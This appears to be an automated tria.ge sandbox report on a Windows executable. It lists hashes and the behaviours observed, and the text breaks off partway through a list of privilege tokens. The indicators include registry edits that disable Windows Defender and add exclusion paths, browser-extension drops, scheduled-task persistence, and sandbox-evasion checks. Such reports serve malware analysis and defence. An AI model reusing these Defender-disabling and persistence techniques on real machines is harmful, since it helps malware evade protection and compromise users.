Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
195s -
max time network
196s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
01/05/2024, 23:51
Static task
static1
Behavioral task
behavioral1
Sample
bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe
Resource
win7-20240419-en
General
-
Target
bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe
-
Size
7.3MB
-
MD5
49c1c3d1621a7af828cde4e712a64f26
-
SHA1
ba16d384f3fbd954eaa8deab2808e2341fd7466e
-
SHA256
bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3
-
SHA512
0a954fe59edfc36d62859f8ca9cd32d5043662f92aa2c4d136fee185ec3c3ce305d1f0c55dc1301eb1956fb6885dff973ba2b0074dad5ffaac9e95b712f4398f
-
SSDEEP
196608:91OBiBwIPypbHKxKJAkezCFo3+vy80LtkJL5e+2Xo:3OBiB/P4b/e6K/jaDwo
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PqbaBdNutUHU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tcAZjUgKvOkyC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tcAZjUgKvOkyC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vTGqftCYFnqsQTavPzR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lExdmLMBU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ruvdGviMRzUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TtNtWPRQARDvDBvI = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TtNtWPRQARDvDBvI = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TtNtWPRQARDvDBvI = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vTGqftCYFnqsQTavPzR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\ypvfxRdiVpdIIEVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PqbaBdNutUHU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lExdmLMBU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ruvdGviMRzUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\ypvfxRdiVpdIIEVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TtNtWPRQARDvDBvI = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 2316 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Control Panel\International\Geo\Nation lnsBcGR.exe -
Executes dropped EXE 4 IoCs
pid Process 2564 Install.exe 2628 Install.exe 856 kVOVvTh.exe 1220 lnsBcGR.exe -
Loads dropped DLL 12 IoCs
pid Process 1884 bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe 2564 Install.exe 2564 Install.exe 2564 Install.exe 2564 Install.exe 2628 Install.exe 2628 Install.exe 2628 Install.exe 2316 rundll32.exe 2316 rundll32.exe 2316 rundll32.exe 2316 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json lnsBcGR.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json lnsBcGR.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini kVOVvTh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat lnsBcGR.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA lnsBcGR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 lnsBcGR.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol lnsBcGR.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F lnsBcGR.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA lnsBcGR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA lnsBcGR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F lnsBcGR.exe File created C:\Windows\system32\GroupPolicy\gpt.ini kVOVvTh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 lnsBcGR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA lnsBcGR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 lnsBcGR.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol kVOVvTh.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol kVOVvTh.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 lnsBcGR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\lExdmLMBU\wHsUjx.dll lnsBcGR.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi lnsBcGR.exe File created C:\Program Files (x86)\lExdmLMBU\TqEKbTe.xml lnsBcGR.exe File created C:\Program Files (x86)\vTGqftCYFnqsQTavPzR\yjEkrSQ.xml lnsBcGR.exe File created C:\Program Files (x86)\tcAZjUgKvOkyC\ptGtmGk.dll lnsBcGR.exe File created C:\Program Files (x86)\ruvdGviMRzUn\aBijeXM.dll lnsBcGR.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi lnsBcGR.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak lnsBcGR.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja lnsBcGR.exe File created C:\Program Files (x86)\PqbaBdNutUHU2\bwRHPstUnjfxS.dll lnsBcGR.exe File created C:\Program Files (x86)\PqbaBdNutUHU2\xTItakc.xml lnsBcGR.exe File created C:\Program Files (x86)\vTGqftCYFnqsQTavPzR\IfBFXIa.dll lnsBcGR.exe File created C:\Program Files (x86)\tcAZjUgKvOkyC\EUUntFm.xml lnsBcGR.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\baOmDneVXoOuKLmJPZ.job schtasks.exe File created C:\Windows\Tasks\YoRBImjUnYbxcjeUQ.job schtasks.exe File created C:\Windows\Tasks\kRLTqYWysAZjVOw.job schtasks.exe File created C:\Windows\Tasks\qZvWQJXUOVWXUoxnV.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 112 schtasks.exe 1664 schtasks.exe 2248 schtasks.exe 1452 schtasks.exe 1708 schtasks.exe 2440 schtasks.exe 2468 schtasks.exe 868 schtasks.exe 1000 schtasks.exe 1604 schtasks.exe 764 schtasks.exe 1892 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000050142284229cda01 kVOVvTh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6E343C87-8161-4602-BBC6-EBE34AE9FD68}\WpadNetworkName = "Network 3" lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached kVOVvTh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" lnsBcGR.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs lnsBcGR.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-eb-ea-02-0c-24\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6E343C87-8161-4602-BBC6-EBE34AE9FD68}\WpadDecisionTime = 505b29ae229cda01 lnsBcGR.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-eb-ea-02-0c-24\WpadDecision = "0" lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6E343C87-8161-4602-BBC6-EBE34AE9FD68} lnsBcGR.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-eb-ea-02-0c-24\WpadDecisionReason = "1" lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates lnsBcGR.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings lnsBcGR.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-eb-ea-02-0c-24\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6E343C87-8161-4602-BBC6-EBE34AE9FD68}\WpadDecision = "0" lnsBcGR.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kVOVvTh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust lnsBcGR.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00df000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-eb-ea-02-0c-24\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-eb-ea-02-0c-24 lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0db9d84229cda01 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6E343C87-8161-4602-BBC6-EBE34AE9FD68}\WpadDecisionReason = "1" lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6E343C87-8161-4602-BBC6-EBE34AE9FD68}\52-eb-ea-02-0c-24 lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs lnsBcGR.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs lnsBcGR.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-eb-ea-02-0c-24 rundll32.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 1472 powershell.exe 352 powershell.exe 352 powershell.exe 352 powershell.exe 3056 powershell.EXE 3056 powershell.EXE 3056 powershell.EXE 876 powershell.EXE 876 powershell.EXE 876 powershell.EXE 2504 powershell.exe 2952 powershell.EXE 2952 powershell.EXE 2952 powershell.EXE 816 powershell.exe 816 powershell.exe 816 powershell.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 2320 powershell.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 1676 powershell.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe 1220 lnsBcGR.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2536 powershell.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeIncreaseQuotaPrivilege 2128 WMIC.exe Token: SeSecurityPrivilege 2128 WMIC.exe Token: SeTakeOwnershipPrivilege 2128 WMIC.exe Token: SeLoadDriverPrivilege 2128 WMIC.exe Token: SeSystemProfilePrivilege 2128 WMIC.exe Token: SeSystemtimePrivilege 2128 WMIC.exe Token: SeProfSingleProcessPrivilege 2128 WMIC.exe Token: SeIncBasePriorityPrivilege 2128 WMIC.exe Token: SeCreatePagefilePrivilege 2128 WMIC.exe Token: SeBackupPrivilege 2128 WMIC.exe Token: SeRestorePrivilege 2128 WMIC.exe Token: SeShutdownPrivilege 2128 WMIC.exe Token: SeDebugPrivilege 2128 WMIC.exe Token: SeSystemEnvironmentPrivilege 2128 WMIC.exe Token: SeRemoteShutdownPrivilege 2128 WMIC.exe Token: SeUndockPrivilege 2128 WMIC.exe Token: SeManageVolumePrivilege 2128 WMIC.exe Token: 33 2128 WMIC.exe Token: 34 2128 WMIC.exe Token: 35 2128 WMIC.exe Token: SeDebugPrivilege 352 powershell.exe Token: SeDebugPrivilege 3056 powershell.EXE Token: SeDebugPrivilege 876 powershell.EXE Token: SeDebugPrivilege 2504 powershell.exe Token: SeAssignPrimaryTokenPrivilege 888 WMIC.exe Token: SeIncreaseQuotaPrivilege 888 WMIC.exe Token: SeSecurityPrivilege 888 WMIC.exe Token: SeTakeOwnershipPrivilege 888 WMIC.exe Token: SeLoadDriverPrivilege 888 WMIC.exe Token: SeSystemtimePrivilege 888 WMIC.exe Token: SeBackupPrivilege 888 WMIC.exe Token: SeRestorePrivilege 888 WMIC.exe Token: SeShutdownPrivilege 888 WMIC.exe Token: SeSystemEnvironmentPrivilege 888 WMIC.exe Token: SeUndockPrivilege 888 WMIC.exe Token: SeManageVolumePrivilege 888 WMIC.exe Token: SeDebugPrivilege 2952 powershell.EXE Token: SeDebugPrivilege 816 powershell.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1692 WMIC.exe Token: SeIncreaseQuotaPrivilege 1692 WMIC.exe Token: SeSecurityPrivilege 1692 WMIC.exe Token: SeTakeOwnershipPrivilege 1692 WMIC.exe Token: SeLoadDriverPrivilege 1692 WMIC.exe Token: SeSystemtimePrivilege 1692 WMIC.exe Token: 